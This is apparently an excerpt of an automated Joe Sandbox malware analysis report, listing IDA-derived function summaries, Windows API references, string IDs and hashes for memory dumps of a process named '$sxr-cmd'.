                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                            • String ID: api-ms-
                                                                                                            • API String ID: 2559590344-2084034818
                                                                                                            • Opcode ID: b9fc0f4bc552b3b3a9613ae8c221c9ea50584cfdf87ea6a2e8fae9693c69d0a1
                                                                                                            • Instruction ID: b8076277a65db6ee59e59e4c8e143cba1ad5d806929f350c7b04949a90788a64
                                                                                                            • Opcode Fuzzy Hash: b9fc0f4bc552b3b3a9613ae8c221c9ea50584cfdf87ea6a2e8fae9693c69d0a1
                                                                                                            • Instruction Fuzzy Hash: 3E31C771312E68F5FE51DB12A448FE96295FBE6BA9F990555FD1E07344EF38C0488310
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                            • String ID: CONOUT$
                                                                                                            • API String ID: 3230265001-3130406586
                                                                                                            • Opcode ID: f8e4fb7eb8850db5dfc64f60f3363a5c279c997be71987712cd29a709cc65782
                                                                                                            • Instruction ID: 608acbce308d45dc818a1acd36c121e4531e78bb6e5feb4adca1b05f3d9a0338
                                                                                                            • Opcode Fuzzy Hash: f8e4fb7eb8850db5dfc64f60f3363a5c279c997be71987712cd29a709cc65782
                                                                                                            • Instruction Fuzzy Hash: 4E119332311F50D6FB508B42F868B99A6A1F7E8BE8F804254FA1D87798DF3CC4488740
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memsetwcsspn
                                                                                                            • String ID:
                                                                                                            • API String ID: 3809306610-0
                                                                                                            • Opcode ID: dc78cd9d6f231a5cf0425b770118c4c3823133ec0f4f9eb011d5dfda8e43b70b
                                                                                                            • Instruction ID: cf77d447f2d09ef8b22e3ed108edfa85b6b4991d45f691c0f4aa8bcab8e14edb
                                                                                                            • Opcode Fuzzy Hash: dc78cd9d6f231a5cf0425b770118c4c3823133ec0f4f9eb011d5dfda8e43b70b
                                                                                                            • Instruction Fuzzy Hash: DFB1E166A08F4686EB90EF15E490279E7A4FB48BA0FC18031DA5E63790DF7DD84DC320
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Thread$Current$Context
                                                                                                            • String ID:
                                                                                                            • API String ID: 1666949209-0
                                                                                                            • Opcode ID: a98e7eacdc5a578abce32cb4d6227d29aaf631d1a1811a31ba6b33f7cbd6c913
                                                                                                            • Instruction ID: c9cf3e6db11516b911fe23d97aa86dd2a3aef80fbbf3b71b7bd4725a1779a513
                                                                                                            • Opcode Fuzzy Hash: a98e7eacdc5a578abce32cb4d6227d29aaf631d1a1811a31ba6b33f7cbd6c913
                                                                                                            • Instruction Fuzzy Hash: 2AD1EC36209F58D1EE308B1AE49479AB7A1F3D9B89F500152EACE47BA5CF3CC545CB00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: wcschr$iswdigit$wcstol
                                                                                                            • String ID:
                                                                                                            • API String ID: 3841054028-0
                                                                                                            • Opcode ID: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                                                                                                            • Instruction ID: 4eb5568065147ee3debd9084fc9a454ccca16ff2bc5d6be8c51cc69056defc85
                                                                                                            • Opcode Fuzzy Hash: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                                                                                                            • Instruction Fuzzy Hash: F851F827A14D5286E7A0AB1594101B9BAE1FF687B0FC48331DE6D572D4DF3EE4A9C230
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • _get_osfhandle.MSVCRT ref: 00007FF713803687
                                                                                                            • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF7137E260D), ref: 00007FF7138036A6
                                                                                                            • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF7137E260D), ref: 00007FF7138036EB
                                                                                                            • _get_osfhandle.MSVCRT ref: 00007FF713803703
                                                                                                            • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF7137E260D), ref: 00007FF713803722
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Console$Write_get_osfhandle$Mode
                                                                                                            • String ID:
                                                                                                            • API String ID: 1066134489-0
                                                                                                            • Opcode ID: 989124be994080129bedea4b9ae1d4c283fccc3ce7243235c73d6b8a7e8f68c3
                                                                                                            • Instruction ID: 744d76ec5278e845867b5c754966453a7695a5e4afc78ea5959d55017834abb0
                                                                                                            • Opcode Fuzzy Hash: 989124be994080129bedea4b9ae1d4c283fccc3ce7243235c73d6b8a7e8f68c3
                                                                                                            • Instruction Fuzzy Hash: CA51C561B08A4287EBA46F11944057AE6D0FB447B0F884135DE5E27791DF7EE45C8B30
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Process$AllocFree
                                                                                                            • String ID: $sxr
                                                                                                            • API String ID: 756756679-21942930
                                                                                                            • Opcode ID: a56984c12cd63be28461b1521c27a5cf1022700db7ead991f356a21bfefe692f
                                                                                                            • Instruction ID: 619a959f1b9d8a5fa069152063c5ad6af2ed03f60af1f8ab0ee205dcea0b9884
                                                                                                            • Opcode Fuzzy Hash: a56984c12cd63be28461b1521c27a5cf1022700db7ead991f356a21bfefe692f
                                                                                                            • Instruction Fuzzy Hash: 6D31F631701F28E6FF10DF16E448BA5A3A2FBA5B99F844060BF4A13B54EF38C4698700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                              • Part of subcall function 00007FF7137F3578: _get_osfhandle.MSVCRT ref: 00007FF7137F3584
                                                                                                              • Part of subcall function 00007FF7137F3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7137E32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF7137F359C
                                                                                                              • Part of subcall function 00007FF7137F3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7137E32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF7137F35C3
                                                                                                              • Part of subcall function 00007FF7137F3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7137E32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF7137F35D9
                                                                                                              • Part of subcall function 00007FF7137F3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7137E32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF7137F35ED
                                                                                                              • Part of subcall function 00007FF7137F3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7137E32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF7137F3602
                                                                                                            • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF7137F3491,?,?,00000000,00007FF713804420), ref: 00007FF7137F3514
                                                                                                            • _get_osfhandle.MSVCRT ref: 00007FF7137F3522
                                                                                                            • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,00000000,00007FF7137F3491,?,?,00000000,00007FF713804420), ref: 00007FF7137F3541
                                                                                                            • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF7137F3491,?,?,00000000,00007FF713804420), ref: 00007FF7137F355E
                                                                                                              • Part of subcall function 00007FF7137F36EC: _get_osfhandle.MSVCRT ref: 00007FF7137F3715
                                                                                                              • Part of subcall function 00007FF7137F36EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7137F3770
                                                                                                              • Part of subcall function 00007FF7137F36EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7137F3791
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
                                                                                                            • String ID:
                                                                                                            • API String ID: 4057327938-0
                                                                                                            • Opcode ID: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
                                                                                                            • Instruction ID: d1142fe06e808366a7143ad41a85d06b3662aff58697aaa5405b928e2d42b71c
                                                                                                            • Opcode Fuzzy Hash: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
                                                                                                            • Instruction Fuzzy Hash: E1319021A08E028AF7D1BB25948007DFAA8FF8DB60FC44135DA5E63795DE3DE81C8630
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcsicmpwcschr$Heap$AllocProcessiswspace
                                                                                                            • String ID: KEYS$LIST$OFF
                                                                                                            • API String ID: 411561164-4129271751
                                                                                                            • Opcode ID: a121d4422169a03a8948a6a352fe20c9f9ce11d79d327e7c837c8152995131a9
                                                                                                            • Instruction ID: fd2f1cd367d4068c43cbe6116a79a3d14c471cfc0df233315699be19afadd3b7
                                                                                                            • Opcode Fuzzy Hash: a121d4422169a03a8948a6a352fe20c9f9ce11d79d327e7c837c8152995131a9
                                                                                                            • Instruction Fuzzy Hash: 65216220A08E0386FBD5BF25A441175E6A1EF487B0FC49631CA5E672E4EE7ED46C8630
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • _get_osfhandle.MSVCRT ref: 00007FF7137F01C4
                                                                                                            • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7137FE904,?,?,?,?,00000000,00007FF7137F3491,?,?,00000000,00007FF713804420), ref: 00007FF7137F01D6
                                                                                                            • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,00007FF7137FE904,?,?,?,?,00000000,00007FF7137F3491,?,?,00000000,00007FF713804420), ref: 00007FF7137F0212
                                                                                                            • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF7137FE904,?,?,?,?,00000000,00007FF7137F3491,?,?,00000000,00007FF713804420), ref: 00007FF7137F0228
                                                                                                            • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,00007FF7137FE904,?,?,?,?,00000000,00007FF7137F3491,?,?,00000000,00007FF713804420), ref: 00007FF7137F023C
                                                                                                            • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF7137FE904,?,?,?,?,00000000,00007FF7137F3491,?,?,00000000,00007FF713804420), ref: 00007FF7137F0251
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 513048808-0
                                                                                                            • Opcode ID: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
                                                                                                            • Instruction ID: 01e6fc4a6d124586b783837757084c002282822e0f29f7f140fd23a1bda413f7
                                                                                                            • Opcode Fuzzy Hash: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
                                                                                                            • Instruction Fuzzy Hash: 9B217A21918E82CBE7D17B64A584238EA94FB49775FA44134DA2F227D4CF7DE45C8730
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 4104442557-0
                                                                                                            • Opcode ID: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                                                                                                            • Instruction ID: 3a4dd3aea6b6e0e4f585ed8782663ccd1006d2b5fd47e5bd531a3bb1b33e5089
                                                                                                            • Opcode Fuzzy Hash: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                                                                                                            • Instruction Fuzzy Hash: FF113322704F418FEB40EF74E8442A873A4FB19768F800A34EA6D57B54DF7DD6A88360
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • _get_osfhandle.MSVCRT ref: 00007FF7137F3584
                                                                                                            • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7137E32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF7137F359C
                                                                                                            • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7137E32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF7137F35C3
                                                                                                            • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7137E32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF7137F35D9
                                                                                                            • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7137E32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF7137F35ED
                                                                                                            • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7137E32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF7137F3602
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 513048808-0
                                                                                                            • Opcode ID: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                                                                                                            • Instruction ID: d9807086b6c11b3649f521ef5a84500966a018fbe1710b59898d5756fd8cbe4d
                                                                                                            • Opcode Fuzzy Hash: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                                                                                                            • Instruction Fuzzy Hash: 15115B21A08E4286EBD06B24A584178EAA4FB8EB75F945334DA3E137D0DE7DD45C8720
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 517849248-0
                                                                                                            • Opcode ID: dd2bb52e115c473e0f8e08ec62385b9b1bc9a7885310831d85afcbe291b8297d
                                                                                                            • Instruction ID: e6282a0ba8e6ae92b1a940e0ade8aa942ebc5de07dc03648e2f82894bb641107
                                                                                                            • Opcode Fuzzy Hash: dd2bb52e115c473e0f8e08ec62385b9b1bc9a7885310831d85afcbe291b8297d
                                                                                                            • Instruction Fuzzy Hash: DB015E31301E55E6FA50DB12A468B99A3A2F798FD4F844074EE4A43758DF38C589C740
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 449555515-0
                                                                                                            • Opcode ID: 4f9aa0d141a117e5b28f836a31fda0da5fbbd9299a6c1a47c4e907238d40991d
                                                                                                            • Instruction ID: 717e8b7054fd84cf82244cd4a899a420a65af92a63f0652a6642f53cd8cbb38f
                                                                                                            • Opcode Fuzzy Hash: 4f9aa0d141a117e5b28f836a31fda0da5fbbd9299a6c1a47c4e907238d40991d
                                                                                                            • Instruction Fuzzy Hash: B0115275702F68F6FF109B25F45DB9562A2B7A9B59F840464EE4917758EF3DC00C8700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7138071F9
                                                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF71380720D
                                                                                                            • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF713807300
                                                                                                              • Part of subcall function 00007FF713805740: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,?,?,00007FF7138075C4,?,?,00000000,00007FF713806999,?,?,?,?,?,00007FF7137F8C39), ref: 00007FF713805744
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: OpenSemaphore$CloseErrorHandleLast
                                                                                                            • String ID: _p0$wil
                                                                                                            • API String ID: 455305043-1814513734
